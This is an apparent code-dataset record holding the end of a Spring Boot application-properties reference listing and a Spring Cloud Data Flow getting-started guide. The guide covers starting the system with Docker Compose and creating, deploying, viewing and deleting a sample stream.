({sc-spring-boot}\/SpringApplication.{sc-ext}[SpringApplication])\n\tspring.main.sources=\n\tspring.main.web-environment= # detect by default\n\tspring.main.show-banner=true\n\tspring.main....= # see class for all properties\n\n\t# LOGGING\n\tlogging.path=\/var\/logs\n\tlogging.file=myapp.log\n\tlogging.config= # location of config file (default classpath:logback.xml for logback)\n logging.level.*= # levels for loggers, e.g. \"logging.level.org.springframework=DEBUG\" (TRACE, DEBUG, INFO, WARN, ERROR, FATAL, OFF)\n\n\t# IDENTITY ({sc-spring-boot}\/context\/ContextIdApplicationContextInitializer.{sc-ext}[ContextIdApplicationContextInitializer])\n\tspring.application.name=\n\tspring.application.index=\n\n\t# EMBEDDED SERVER CONFIGURATION ({sc-spring-boot-autoconfigure}\/web\/ServerProperties.{sc-ext}[ServerProperties])\n\tserver.port=8080\n\tserver.address= # bind to a specific NIC\n\tserver.session-timeout= # session timeout in seconds\n\tserver.context-path= # the context path, defaults to '\/'\n\tserver.servlet-path= # the servlet path, defaults to '\/'\n\tserver.ssl.client-auth= # want or need\n\tserver.ssl.key-alias=\n\tserver.ssl.key-password=\n\tserver.ssl.key-store=\n\tserver.ssl.key-store-password=\n\tserver.ssl.key-store-provider=\n\tserver.ssl.key-store-type=\n\tserver.ssl.protocol=TLS\n\tserver.ssl.trust-store=\n\tserver.ssl.trust-store-password=\n\tserver.ssl.trust-store-provider=\n\tserver.ssl.trust-store-type=\n\tserver.tomcat.access-log-pattern= # log pattern of the access log\n\tserver.tomcat.access-log-enabled=false # is access logging enabled\n\tserver.tomcat.internal-proxies=10\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}|\\\\\n\t\t\t192\\\\.168\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}|\\\\\n\t\t\t169\\\\.254\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}|\\\\\n\t\t\t127\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3} # regular expression matching trusted IP addresses\n\tserver.tomcat.protocol-header=x-forwarded-proto # front end proxy forward header\n\tserver.tomcat.port-header= # front end proxy port header\n\tserver.tomcat.remote-ip-header=x-forwarded-for\n\tserver.tomcat.basedir=\/tmp # base dir (usually not needed, defaults to tmp)\n\tserver.tomcat.background-processor-delay=30; # in seconds\n\tserver.tomcat.max-threads = 0 # number of threads in protocol handler\n\tserver.tomcat.uri-encoding = UTF-8 # character encoding to use for URL decoding\n\n\t# SPRING MVC ({sc-spring-boot-autoconfigure}\/web\/HttpMapperProperties.{sc-ext}[HttpMapperProperties])\n\thttp.mappers.json-pretty-print=false # pretty print 
JSON\n\thttp.mappers.json-sort-keys=false # sort keys\n\tspring.mvc.locale= # set fixed locale, e.g. en_UK\n\tspring.mvc.date-format= # set fixed date format, e.g. dd\/MM\/yyyy\n\tspring.mvc.message-codes-resolver-format= # PREFIX_ERROR_CODE \/ POSTFIX_ERROR_CODE\n\tspring.view.prefix= # MVC view prefix\n\tspring.view.suffix= # ... and suffix\n\tspring.resources.cache-period= # cache timeouts in headers sent to browser\n\tspring.resources.add-mappings=true # if default mappings should be added\n\n\t# THYMELEAF ({sc-spring-boot-autoconfigure}\/thymeleaf\/ThymeleafAutoConfiguration.{sc-ext}[ThymeleafAutoConfiguration])\n\tspring.thymeleaf.check-template-location=true\n\tspring.thymeleaf.prefix=classpath:\/templates\/\n\tspring.thymeleaf.suffix=.html\n\tspring.thymeleaf.mode=HTML5\n\tspring.thymeleaf.encoding=UTF-8\n\tspring.thymeleaf.content-type=text\/html # ;charset=<encoding> is added\n\tspring.thymeleaf.cache=true # set to false for hot refresh\n\n\t# FREEMARKER ({sc-spring-boot-autoconfigure}\/freemarker\/FreeMarkerAutoConfiguration.{sc-ext}[FreeMarkerAutoConfiguration])\n\tspring.freemarker.allow-request-override=false\n\tspring.freemarker.cache=true\n\tspring.freemarker.check-template-location=true\n\tspring.freemarker.char-set=UTF-8\n\tspring.freemarker.contentType=text\/html\n\tspring.freemarker.exposeRequestAttributes=false\n\tspring.freemarker.exposeSessionAttributes=false\n\tspring.freemarker.exposeSpringMacroHelpers=false\n\tspring.freemarker.prefix=\n\tspring.freemarker.requestContextAttribute=\n\tspring.freemarker.settings.*=\n\tspring.freemarker.suffix=.ftl\n\tspring.freemarker.template-loader-path=classpath:\/templates\/\n\tspring.freemarker.viewNames= # whitelist of view names that can be resolved\n\n\t# GROOVY TEMPLATES ({sc-spring-boot-autoconfigure}\/groovy\/template\/GroovyTemplateAutoConfiguration.{sc-ext}[GroovyTemplateAutoConfiguration])\n\tspring.groovy.template.cache=true\n\tspring.groovy.template.char-set=UTF-8\n\tspring.groovy.template.configuration.*= # See Groovy's TemplateConfiguration\n\tspring.groovy.template.contentType=text\/html\n\tspring.groovy.template.prefix=classpath:\/templates\/\n\tspring.groovy.template.suffix=.tpl\n\tspring.groovy.template.view-names= # whitelist of view names that can be resolved\n\n\t# VELOCITY TEMPLATES ({sc-spring-boot-autoconfigure}\/velocity\/VelocityAutoConfiguration.{sc-ext}[VelocityAutoConfiguration])\n\tspring.velocity.allow-request-override=false\n\tspring.velocity.cache=true\n\tspring.velocity.check-template-location=true\n\tspring.velocity.char-set=UTF-8\n\tspring.velocity.content-type=text\/html\n\tspring.velocity.date-tool-attribute=\n\tspring.velocity.expose-Request-attributes=false\n\tspring.velocity.expose-Session-attributes=false\n\tspring.velocity.expose-Spring-macro-helpers=false\n\tspring.velocity.number-tool-attribute=\n\tspring.velocity.prefix=\n\tspring.velocity.properties.*=\n\tspring.velocity.request-context-attribute=\n\tspring.velocity.resource-loader-path=classpath:\/templates\/\n\tspring.velocity.suffix=.vm\n\tspring.velocity.view-names= # whitelist of view names that can be resolved\n\n\t# INTERNATIONALIZATION ({sc-spring-boot-autoconfigure}\/MessageSourceAutoConfiguration.{sc-ext}[MessageSourceAutoConfiguration])\n\tspring.messages.basename=messages\n\tspring.messages.cacheSeconds=-1\n\tspring.messages.encoding=UTF-8\n\n\t[[common-application-properties-security]]\n\t# SECURITY ({sc-spring-boot-autoconfigure}\/security\/SecurityProperties.{sc-ext}[SecurityProperties])\n\tsecurity.user.name=user # 
login username\n\tsecurity.user.password= # login password\n\tsecurity.user.role=USER # role assigned to the user\n\tsecurity.require-ssl=false # advanced settings ...\n\tsecurity.enable-csrf=false\n\tsecurity.basic.enabled=true\n\tsecurity.basic.realm=Spring\n\tsecurity.basic.path= # \/**\n\tsecurity.headers.xss=false\n\tsecurity.headers.cache=false\n\tsecurity.headers.frame=false\n\tsecurity.headers.content-type=false\n\tsecurity.headers.hsts=all # none \/ domain \/ all\n\tsecurity.sessions=stateless # always \/ never \/ if_required \/ stateless\n\tsecurity.ignored=false\n\n\t# DATASOURCE ({sc-spring-boot-autoconfigure}\/jdbc\/DataSourceAutoConfiguration.{sc-ext}[DataSourceAutoConfiguration] & {sc-spring-boot-autoconfigure}\/jdbc\/DataSourceProperties.{sc-ext}[DataSourceProperties])\n\tspring.datasource.name= # name of the data source\n\tspring.datasource.initialize=true # populate using data.sql\n\tspring.datasource.schema= # a schema (DDL) script resource reference\n\tspring.datasource.data= # a data (DML) script resource reference\n\tspring.datasource.sql-script-encoding= # a charset for reading SQL scripts\n\tspring.datasource.platform= # the platform to use in the schema resource (schema-${platform}.sql)\n\tspring.datasource.continue-on-error=false # continue even if can't be initialized\n\tspring.datasource.separator=; # statement separator in SQL initialization scripts\n\tspring.datasource.driver-class-name= # JDBC Settings...\n\tspring.datasource.url=\n\tspring.datasource.username=\n\tspring.datasource.password=\n\tspring.datasource.max-active=100 # Advanced configuration...\n\tspring.datasource.max-idle=8\n\tspring.datasource.min-idle=8\n\tspring.datasource.initial-size=10\n\tspring.datasource.validation-query=\n\tspring.datasource.test-on-borrow=false\n\tspring.datasource.test-on-return=false\n\tspring.datasource.test-while-idle=\n\tspring.datasource.time-between-eviction-runs-millis=\n\tspring.datasource.min-evictable-idle-time-millis=\n\tspring.datasource.max-wait=\n\n\t# MONGODB ({sc-spring-boot-autoconfigure}\/mongo\/MongoProperties.{sc-ext}[MongoProperties])\n\tspring.data.mongodb.host= # the db host\n\tspring.data.mongodb.port=27017 # the connection port (defaults to 27107)\n\tspring.data.mongodb.uri=mongodb:\/\/localhost\/test # connection URL\n\tspring.data.mongo.repositories.enabled=true # if spring data repository support is enabled\n\n\t# JPA ({sc-spring-boot-autoconfigure}\/orm\/jpa\/JpaBaseConfiguration.{sc-ext}[JpaBaseConfiguration], {sc-spring-boot-autoconfigure}\/orm\/jpa\/HibernateJpaAutoConfiguration.{sc-ext}[HibernateJpaAutoConfiguration])\n\tspring.jpa.properties.*= # properties to set on the JPA connection\n\tspring.jpa.open-in-view=true\n\tspring.jpa.show-sql=true\n\tspring.jpa.database-platform=\n\tspring.jpa.database=\n\tspring.jpa.generate-ddl=false # ignored by Hibernate, might be useful for other vendors\n\tspring.jpa.hibernate.naming-strategy= # naming classname\n\tspring.jpa.hibernate.ddl-auto= # defaults to create-drop for embedded dbs\n\tspring.data.jpa.repositories.enabled=true # if spring data repository support is enabled\n\n\t# SOLR ({sc-spring-boot-autoconfigure}\/solr\/SolrProperties.{sc-ext}[SolrProperties}])\n\tspring.data.solr.host=http:\/\/127.0.0.1:8983\/solr\n\tspring.data.solr.zk-host=\n\tspring.data.solr.repositories.enabled=true # if spring data repository support is enabled\n\n\t# ELASTICSEARCH 
({sc-spring-boot-autoconfigure}\/elasticsearch\/ElasticsearchProperties.{sc-ext}[ElasticsearchProperties}])\n\tspring.data.elasticsearch.cluster-name= # The cluster name (defaults to elasticsearch)\n\tspring.data.elasticsearch.cluster-nodes= # The address(es) of the server node (comma-separated; if not specified starts a client node)\n\tspring.data.elasticsearch.repositories.enabled=true # if spring data repository support is enabled\n\n\n\n\t# FLYWAY ({sc-spring-boot-autoconfigure}\/flyway\/FlywayProperties.{sc-ext}[FlywayProperties])\n\tflyway.locations=classpath:db\/migration # locations of migrations scripts\n\tflyway.schemas= # schemas to update\n\tflyway.init-version= 1 # version to start migration\n\tflyway.sql-migration-prefix=V\n\tflyway.sql-migration-suffix=.sql\n\tflyway.enabled=true\n\tflyway.url= # JDBC url if you want Flyway to create its own DataSource\n\tflyway.user= # JDBC username if you want Flyway to create its own DataSource\n\tflyway.password= # JDBC password if you want Flyway to create its own DataSource\n\n\t# LIQUIBASE ({sc-spring-boot-autoconfigure}\/liquibase\/LiquibaseProperties.{sc-ext}[LiquibaseProperties])\n\tliquibase.change-log=classpath:\/db\/changelog\/db.changelog-master.yaml\n\tliquibase.contexts= # runtime contexts to use\n\tliquibase.default-schema= # default database schema to use\n\tliquibase.drop-first=false\n\tliquibase.enabled=true\n\tliquibase.url= # specific JDBC url (if not set the default datasource is used)\n\tliquibase.user= # user name for liquibase.url\n\tliquibase.password= # password for liquibase.url\n\n\t# JMX\n\tspring.jmx.enabled=true # Expose MBeans from Spring\n\n\t# RABBIT ({sc-spring-boot-autoconfigure}\/amqp\/RabbitProperties.{sc-ext}[RabbitProperties])\n\tspring.rabbitmq.host= # connection host\n\tspring.rabbitmq.port= # connection port\n\tspring.rabbitmq.addresses= # connection addresses (e.g. 
myhost:9999,otherhost:1111)\n\tspring.rabbitmq.username= # login user\n\tspring.rabbitmq.password= # login password\n\tspring.rabbitmq.virtual-host=\n\tspring.rabbitmq.dynamic=\n\n\t# REDIS ({sc-spring-boot-autoconfigure}\/redis\/RedisProperties.{sc-ext}[RedisProperties])\n\tspring.redis.host=localhost # server host\n\tspring.redis.password= # server password\n\tspring.redis.port=6379 # connection port\n\tspring.redis.pool.max-idle=8 # pool settings ...\n\tspring.redis.pool.min-idle=0\n\tspring.redis.pool.max-active=8\n\tspring.redis.pool.max-wait=-1\n\n\t# ACTIVEMQ ({sc-spring-boot-autoconfigure}\/jms\/activemq\/ActiveMQProperties.{sc-ext}[ActiveMQProperties])\n\tspring.activemq.broker-url=tcp:\/\/localhost:61616 # connection URL\n\tspring.activemq.user=\n\tspring.activemq.password=\n\tspring.activemq.in-memory=true # broker kind to create if no broker-url is specified\n\tspring.activemq.pooled=false\n\n\t# HornetQ ({sc-spring-boot-autoconfigure}\/jms\/hornetq\/HornetQProperties.{sc-ext}[HornetQProperties])\n\tspring.hornetq.mode= # connection mode (native, embedded)\n\tspring.hornetq.host=localhost # hornetQ host (native mode)\n\tspring.hornetq.port=5445 # hornetQ port (native mode)\n\tspring.hornetq.embedded.enabled=true # if the embedded server is enabled (needs hornetq-jms-server.jar)\n\tspring.hornetq.embedded.server-id= # auto-generated id of the embedded server (integer)\n\tspring.hornetq.embedded.persistent=false # message persistence\n\tspring.hornetq.embedded.data-directory= # location of data content (when persistence is enabled)\n\tspring.hornetq.embedded.queues= # comma-separated queues to create on startup\n\tspring.hornetq.embedded.topics= # comma-separated topics to create on startup\n\tspring.hornetq.embedded.cluster-password= # customer password (randomly generated by default)\n\n\t# JMS ({sc-spring-boot-autoconfigure}\/jms\/JmsProperties.{sc-ext}[JmsProperties])\n\tspring.jms.pub-sub-domain= # false for queue (default), true for topic\n\n\t# SPRING BATCH ({sc-spring-boot-autoconfigure}\/batch\/BatchDatabaseInitializer.{sc-ext}[BatchDatabaseInitializer])\n\tspring.batch.job.names=job1,job2\n\tspring.batch.job.enabled=true\n\tspring.batch.initializer.enabled=true\n\tspring.batch.schema= # batch schema to load\n\n\t# AOP\n\tspring.aop.auto=\n\tspring.aop.proxy-target-class=\n\n\t# FILE ENCODING ({sc-spring-boot}\/context\/FileEncodingApplicationListener.{sc-ext}[FileEncodingApplicationListener])\n\tspring.mandatory-file-encoding=false\n\n\t# SPRING SOCIAL ({sc-spring-boot-autoconfigure}\/social\/SocialWebAutoConfiguration.{sc-ext}[SocialWebAutoConfiguration])\n\tspring.social.auto-connection-views=true # Set to true for default connection views or false if you provide your own\n\n\t# SPRING SOCIAL FACEBOOK ({sc-spring-boot-autoconfigure}\/social\/FacebookAutoConfiguration.{sc-ext}[FacebookAutoConfiguration])\n\tspring.social.facebook.app-id= # your application's Facebook App ID\n\tspring.social.facebook.app-secret= # your application's Facebook App Secret\n\n\t# SPRING SOCIAL LINKEDIN ({sc-spring-boot-autoconfigure}\/social\/LinkedInAutoConfiguration.{sc-ext}[LinkedInAutoConfiguration])\n\tspring.social.linkedin.app-id= # your application's LinkedIn App ID\n\tspring.social.linkedin.app-secret= # your application's LinkedIn App Secret\n\n\t# SPRING SOCIAL TWITTER ({sc-spring-boot-autoconfigure}\/social\/TwitterAutoConfiguration.{sc-ext}[TwitterAutoConfiguration])\n\tspring.social.twitter.app-id= # your application's Twitter App ID\n\tspring.social.twitter.app-secret= # your 
application's Twitter App Secret\n\n\t# SPRING MOBILE SITE PREFERENCE ({sc-spring-boot-autoconfigure}\/mobile\/SitePreferenceAutoConfiguration.{sc-ext}[SitePreferenceAutoConfiguration])\n\tspring.mobile.sitepreference.enabled=true # enabled by default\n\n\t# SPRING MOBILE DEVICE VIEWS ({sc-spring-boot-autoconfigure}\/mobile\/DeviceDelegatingViewResolverAutoConfiguration.{sc-ext}[DeviceDelegatingViewResolverAutoConfiguration])\n\tspring.mobile.devicedelegatingviewresolver.enabled=true # disabled by default\n\tspring.mobile.devicedelegatingviewresolver.normal-prefix=\n\tspring.mobile.devicedelegatingviewresolver.normal-suffix=\n\tspring.mobile.devicedelegatingviewresolver.mobile-prefix=mobile\/\n\tspring.mobile.devicedelegatingviewresolver.mobile-suffix=\n\tspring.mobile.devicedelegatingviewresolver.tablet-prefix=tablet\/\n\tspring.mobile.devicedelegatingviewresolver.tablet-suffix=\n\n\t# ----------------------------------------\n\t# ACTUATOR PROPERTIES\n\t# ----------------------------------------\n\n\t# MANAGEMENT HTTP SERVER ({sc-spring-boot-actuator}\/autoconfigure\/ManagementServerProperties.{sc-ext}[ManagementServerProperties])\n\tmanagement.port= # defaults to 'server.port'\n\tmanagement.address= # bind to a specific NIC\n\tmanagement.context-path= # default to '\/'\n\tmanagement.add-application-context-header= # default to true\n\n\t# ENDPOINTS ({sc-spring-boot-actuator}\/endpoint\/AbstractEndpoint.{sc-ext}[AbstractEndpoint] subclasses)\n\tendpoints.autoconfig.id=autoconfig\n\tendpoints.autoconfig.sensitive=true\n\tendpoints.autoconfig.enabled=true\n\tendpoints.beans.id=beans\n\tendpoints.beans.sensitive=true\n\tendpoints.beans.enabled=true\n\tendpoints.configprops.id=configprops\n\tendpoints.configprops.sensitive=true\n\tendpoints.configprops.enabled=true\n\tendpoints.configprops.keys-to-sanitize=password,secret\n\tendpoints.dump.id=dump\n\tendpoints.dump.sensitive=true\n\tendpoints.dump.enabled=true\n\tendpoints.env.id=env\n\tendpoints.env.sensitive=true\n\tendpoints.env.enabled=true\n\tendpoints.health.id=health\n\tendpoints.health.sensitive=false\n\tendpoints.health.enabled=true\n\tendpoints.info.id=info\n\tendpoints.info.sensitive=false\n\tendpoints.info.enabled=true\n\tendpoints.metrics.id=metrics\n\tendpoints.metrics.sensitive=true\n\tendpoints.metrics.enabled=true\n\tendpoints.shutdown.id=shutdown\n\tendpoints.shutdown.sensitive=true\n\tendpoints.shutdown.enabled=false\n\tendpoints.trace.id=trace\n\tendpoints.trace.sensitive=true\n\tendpoints.trace.enabled=true\n\n\t# MVC ONLY ENDPOINTS\n\tendpoints.jolokia.path=jolokia\n\tendpoints.jolokia.sensitive=true\n\tendpoints.jolokia.enabled=true # when using Jolokia\n\n\t# JMX ENDPOINT ({sc-spring-boot-actuator}\/autoconfigure\/EndpointMBeanExportProperties.{sc-ext}[EndpointMBeanExportProperties])\n\tendpoints.jmx.enabled=true\n\tendpoints.jmx.domain= # the JMX domain, defaults to 'org.springboot'\n\tendpoints.jmx.unique-names=false\n\tendpoints.jmx.static-names=\n\n\t# JOLOKIA ({sc-spring-boot-actuator}\/autoconfigure\/JolokiaProperties.{sc-ext}[JolokiaProperties])\n\tjolokia.config.*= # See Jolokia manual\n\n\t# REMOTE SHELL\n\tshell.auth=simple # jaas, key, simple, spring\n\tshell.command-refresh-interval=-1\n\tshell.command-path-patterns= # classpath*:\/commands\/**, classpath*:\/crash\/commands\/**\n\tshell.config-path-patterns= # classpath*:\/crash\/*\n\tshell.disabled-plugins=false # don't expose plugins\n\tshell.ssh.enabled= # ssh settings ...\n\tshell.ssh.key-path=\n\tshell.ssh.port=\n\tshell.telnet.enabled= # telnet 
settings ...\n\tshell.telnet.port=\n\tshell.auth.jaas.domain= # authentication settings ...\n\tshell.auth.key.path=\n\tshell.auth.simple.user.name=\n\tshell.auth.simple.user.password=\n\tshell.auth.spring.roles=\n\n\t# GIT INFO\n\tspring.git.properties= # resource ref to generated git info properties file\n----\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8ddd2043909e67eb5d4348f98a471cf4addf0b7a","subject":"Updated doc to fix version replacement in shell download command","message":"Updated doc to fix version replacement in shell download command\n\nA missing tag was preventing the substitution of the repository name and\nversion of SCDF in the command for downloading the shell. This commit\nfixes that.\n","repos":"mminella\/spring-cloud-data,cppwfs\/spring-cloud-dataflow,ilayaperumalg\/spring-cloud-dataflow,jvalkeal\/spring-cloud-dataflow,jvalkeal\/spring-cloud-dataflow,ghillert\/spring-cloud-dataflow,spring-cloud\/spring-cloud-data,spring-cloud\/spring-cloud-dataflow,trisberg\/spring-cloud-dataflow,spring-cloud\/spring-cloud-dataflow,cppwfs\/spring-cloud-dataflow,markpollack\/spring-cloud-dataflow,jvalkeal\/spring-cloud-dataflow,trisberg\/spring-cloud-dataflow,trisberg\/spring-cloud-dataflow,spring-cloud\/spring-cloud-data,jvalkeal\/spring-cloud-data,spring-cloud\/spring-cloud-data,jvalkeal\/spring-cloud-data,cppwfs\/spring-cloud-dataflow,spring-cloud\/spring-cloud-dataflow,markpollack\/spring-cloud-dataflow,jvalkeal\/spring-cloud-data,ghillert\/spring-cloud-dataflow,ilayaperumalg\/spring-cloud-dataflow,mminella\/spring-cloud-data,ilayaperumalg\/spring-cloud-dataflow,spring-cloud\/spring-cloud-dataflow,jvalkeal\/spring-cloud-dataflow,markpollack\/spring-cloud-dataflow,spring-cloud\/spring-cloud-dataflow,jvalkeal\/spring-cloud-dataflow,trisberg\/spring-cloud-dataflow","old_file":"spring-cloud-dataflow-docs\/src\/main\/asciidoc\/getting-started-local.adoc","new_file":"spring-cloud-dataflow-docs\/src\/main\/asciidoc\/getting-started-local.adoc","new_contents":"[[getting-started-local]]\n== Getting Started - Local\n\n[partintro]\n--\nIf you are getting started with Spring Cloud Data Flow, this section is for you.\nIn this section, we answer the basic \"`what?`\", \"`how?`\" and \"`why?`\" questions.\nYou can find a gentle introduction to Spring Cloud Data Flow along with installation instructions.\nWe then build an introductory Spring Cloud Data Flow application, discussing some core principles as we go.\n--\n\n\n[[getting-started-local-system-requirements]]\n=== System Requirements\n\nYou need Java 8 to run and to build you need to have Maven.\n\nBoth the Data Flow Server and Skipper Server need to have an RDBMS installed. The Data Flow Server stores stream and task definitions. It also stores the execution state of deployed tasks. 
The Skipper server stores the execution state of deployed streams.\n\nBy default, the Data Flow server uses an embedded H2 database for this purpose, but you can easily configure the server to use an external database instead.\n\nFor the deployed stream applications to communicate, a messaging middleware product needs to be installed.\nWe provide prebuilt stream applications that use link:http:\/\/www.rabbitmq.com[RabbitMQ] or link:http:\/\/kafka.apache.org[Kafka], though other https:\/\/cloud.spring.io\/spring-cloud-stream\/#binder-implementations[messaging middleware products] are supported as well.\n\n[[getting-started-local-deploying-spring-cloud-dataflow-docker]]\n=== Getting Started with Docker Compose\n\nSpring Cloud Data Flow provides a Docker Compose file to let you quickly bring up Spring Cloud Data Flow, Skipper, and the Apache Kafka broker, instead of having to install them manually.\n\nNOTE: We recommend that you upgrade to the link:https:\/\/docs.docker.com\/compose\/install\/[latest version] of Docker before running the `docker-compose` command. We have tested it against Docker Engine version `18.09.2`.\n\nThe following sections describe how to get started with Docker Compose:\n\n[[getting-started-local-deploying-spring-cloud-dataflow-docker-download]]\n=== Downloading the Docker Compose File\n\nBefore you do anything else, you need to download the Docker Compose file. To do so:\n\n. Download the Spring Cloud Data Flow Server Docker Compose file:\n+\n====\n[source,bash,subs=attributes]\n----\n$ wget https:\/\/raw.githubusercontent.com\/spring-cloud\/spring-cloud-dataflow\/{github-tag}\/spring-cloud-dataflow-server\/docker-compose.yml\n----\n====\n\nNOTE: If the `wget` command is unavailable, you can use `curl` or another platform-specific utility. Alternatively, you can navigate to https:\/\/raw.githubusercontent.com\/spring-cloud\/spring-cloud-dataflow\/{github-tag}\/spring-cloud-dataflow-server\/docker-compose.yml[https:\/\/raw.githubusercontent.com\/spring-cloud\/spring-cloud-dataflow\/{github-tag}\/spring-cloud-dataflow-server\/docker-compose.yml] in a web browser and save the contents. Ensure the downloaded filename is `docker-compose.yml`.\n\n[[getting-started-local-deploying-spring-cloud-dataflow-docker-starting]]\n=== Starting Docker Compose\n\nTo get started, you need to start Docker Compose. To do so:\n\n. In the directory where you downloaded `docker-compose.yml`, start the system, as follows:\n+\n====\n[source,bash,subs=attributes]\n----\n$ export DATAFLOW_VERSION={local-server-image-tag}\n$ export SKIPPER_VERSION={skipper-version}\n$ docker-compose up\n----\n====\n\nThe `docker-compose.yml` file defines `DATAFLOW_VERSION` and `SKIPPER_VERSION` variables, so that those values can be easily changed. The preceding commands first set the `DATAFLOW_VERSION` and `SKIPPER_VERSION` to use in the environment. Then `docker-compose` is started.\n\nYou can also use a shorthand version that exposes the `DATAFLOW_VERSION` and `SKIPPER_VERSION` variables only to the `docker-compose` process (rather than setting them in the environment), as follows:\n\n====\n[source,bash,subs=attributes]\n----\n$ DATAFLOW_VERSION={local-server-image-tag} SKIPPER_VERSION={skipper-version} docker-compose up\n----\n====\n\n
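Before moving on, you may want to confirm that the containers came up. The following one-liner is a sketch rather than part of the official instructions; it assumes the default service names from the provided `docker-compose.yml` (`dataflow-server`, `skipper`, and `kafka`):\n\n====\n[source,bash]\n----\n# Show the name and status of the containers this guide relies on.\n# Adjust the filter if you renamed the services in docker-compose.yml.\n$ docker ps --format '{{.Names}}: {{.Status}}' | grep -E 'dataflow-server|skipper|kafka'\n----\n====\n\n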
If you use Windows, environment variables are defined by using the `set` command. To start the system on Windows, enter the following commands:\n\n====\n[source,bash,subs=attributes]\n----\nC:\\ set DATAFLOW_VERSION={local-server-image-tag}\nC:\\ set SKIPPER_VERSION={skipper-version}\nC:\\ docker-compose up\n----\n====\n\nNOTE: By default, Docker Compose uses locally available images.\nFor example, when using the `latest` tag, run `docker-compose pull` prior to `docker-compose up` to ensure the latest image is downloaded.\n\nSpring Cloud Data Flow is ready for use once the `docker-compose` command stops emitting log messages.\n\n[[getting-started-local-deploying-spring-cloud-dataflow-docker-launch]]\n=== Launching Spring Cloud Data Flow\n\nNow that Docker Compose is up, you can launch the Spring Cloud Data Flow Dashboard. To do so, in your browser, navigate to the link:http:\/\/localhost:9393\/dashboard[Spring Cloud Data Flow Dashboard].\nBy default, the latest GA releases of Stream and Task applications are imported automatically.\n\n[[getting-started-local-deploying-spring-cloud-dataflow-docker-create-stream]]\n=== Creating a Stream\n\nTo create a stream:\n\n. In the menu, click *Streams*.\n. Click the *Create Stream(s)* button.\n+\nThe screen changes to the following image:\n+\n.Create Stream Page\nimage::images\/dataflow-create-stream-start.png[Create Stream Page, scaledwidth="60%"]\n. In the text area, type `time | log`.\n. Click *Create Stream*.\n. Enter `ticktock` for the stream name, as shown in the following image:\n+\n.Creating a Stream\nimage::images\/dataflow-stream-create.png[Creating a Stream, scaledwidth="60%"]\n. Click the *Create the stream* button.\n+\nThe Definitions page appears.\n+\n.Definitions Page\nimage::images\/dataflow-definitions-page.png[Definitions Page, scaledwidth="60%"]\n\n[[getting-started-local-deploying-spring-cloud-dataflow-docker-deploy-stream]]\n=== Deploying a Stream\n\nNow that you have defined a stream, you can deploy it. To do so:\n\n. Click the play (deploy) button next to the "`ticktock`" definition that you created in the previous section.\n+\n.Initiate Deployment of a Stream\nimage::images\/dataflow-stream-definition-deploy.png[Initiate Deployment of a Stream, scaledwidth="60%"]\n+\nThe UI shows the available properties that can be applied to the apps in the "`ticktock`" stream.\nThe example shown in the following image uses the defaults:\n+\n.Deployment Page\nimage::images\/dataflow-deploy-ticktock.png[Deployment Page, scaledwidth="60%"]\n. Click the *Deploy Stream* button.\n+\nThe UI returns to the Definitions page.\n+\nThe stream is now in "`deploying`" status, and its status becomes "`deployed`" when it is finished deploying.\nYou may need to refresh your browser to see the updated status.\n\n[[getting-started-local-deploying-spring-cloud-dataflow-docker-viewing-stream-logs]]\n=== Viewing Stream Logs\n\nOnce a stream is deployed, you can view its logs. To do so:\n\n. Click *Runtime* in the menu.\n. Click "`ticktock.log`".\n. Copy the path in the "`stdout`" text box on the dashboard.\n. In another console window, type the following, replacing `\/path\/from\/stdout\/textbox\/in\/dashboard` with the value you copied in the previous step:\n+\n====\n[source,bash,subs=attributes]\n----\n$ docker exec -it skipper tail -f \/path\/from\/stdout\/textbox\/in\/dashboard\n----\n====\n+\nThe output of the log sink appears in the new window, printing a timestamp once per second.\n. When you have seen enough of that output, press Ctrl+C to end the `tail` command.\n\n
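If you would rather follow the `time` and `log` applications side by side, the same `docker exec` technique works for any stdout path shown on the Runtime page. The following variation is a sketch; `$TIME_LOG` and `$LOG_LOG` are placeholders for the two paths you copied, not variables defined by this guide:\n\n====\n[source,bash]\n----\n# Follow both application logs at once inside the skipper container.\n# TIME_LOG and LOG_LOG stand in for the stdout paths from the Runtime page.\n$ docker exec -it skipper tail -f "$TIME_LOG" "$LOG_LOG"\n----\n====\n\n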
[[getting-started-local-deploying-spring-cloud-dataflow-docker-deleting-stream]]\n=== Deleting a Stream\n\nNow you can delete the stream you created. To do so:\n\n. Click *Streams* in the menu.\n. Click the down chevron on the "`ticktock`" row.\n. Click *Destroy Stream*.\n. When prompted for confirmation, click *Destroy Stream Definition(s)*.\n\n=== Destroying the Quick Start Environment\n\nYou have finished the getting started guide for using Docker locally, so you can now shut down the environment you created by running `docker-compose up`. To do so:\n\n. Open a new terminal window.\n. Change directory to the directory in which you started (where the `docker-compose.yml` file is located).\n. Run the following command:\n+\n====\n[source,bash,subs=attributes]\n----\n$ DATAFLOW_VERSION={local-server-image-tag} SKIPPER_VERSION={skipper-version} docker-compose down\n----\n====\n+\n(You need to specify the `DATAFLOW_VERSION` and the `SKIPPER_VERSION` because you are running the command in a separate terminal window. The `export` commands you used earlier set the variables for only that terminal window, so those values are not found in the new terminal window. If all else fails, you can shut it down with Ctrl+C. Don't do that for non-demo instances, though.)\n\nNOTE: Some stream applications may open a port, for example `http --server.port=`. By default, a port range of `9000-9010` is exposed from the container to the host. If you need to change this range, you can modify the `ports` block of the `dataflow-server` service in the `docker-compose.yml` file.\n\n[[getting-started-local-customizing-spring-cloud-dataflow-docker]]\n==== Spring Cloud Data Flow Shell\n\nFor convenience and as an alternative to using the Spring Cloud Data Flow Dashboard, the Spring Cloud Data Flow Shell is also included in the `springcloud\/spring-cloud-dataflow-server` Docker image.\nTo use it, open another console window and type the following:\n\n====\n[source,bash]\n----\n$ docker exec -it dataflow-server java -jar shell.jar\n----\n====\n\nUsing the Spring Cloud Data Flow Shell is further described in <<shell,Shell>>.\n\n==== Spring Cloud Data Flow Monitoring\n\nBy default, the Data Flow `docker-compose` configures Stream monitoring with InfluxDB and pre-built dashboards for Grafana.\n\nFor further instructions about Data Flow monitoring, see <<streams-monitoring-local-influx,Streams Monitoring InfluxDB>>.\n\nimage::{dataflow-asciidoc}\/images\/grafana-influxdb-scdf-streams-dashboard.png[Grafana InfluxDB Dashboard, scaledwidth="50%"]\n\n==== Docker Compose Customization\n\nOut of the box, Spring Cloud Data Flow uses the H2 embedded database for storing state and Kafka for communication.\nYou can customize these components by editing 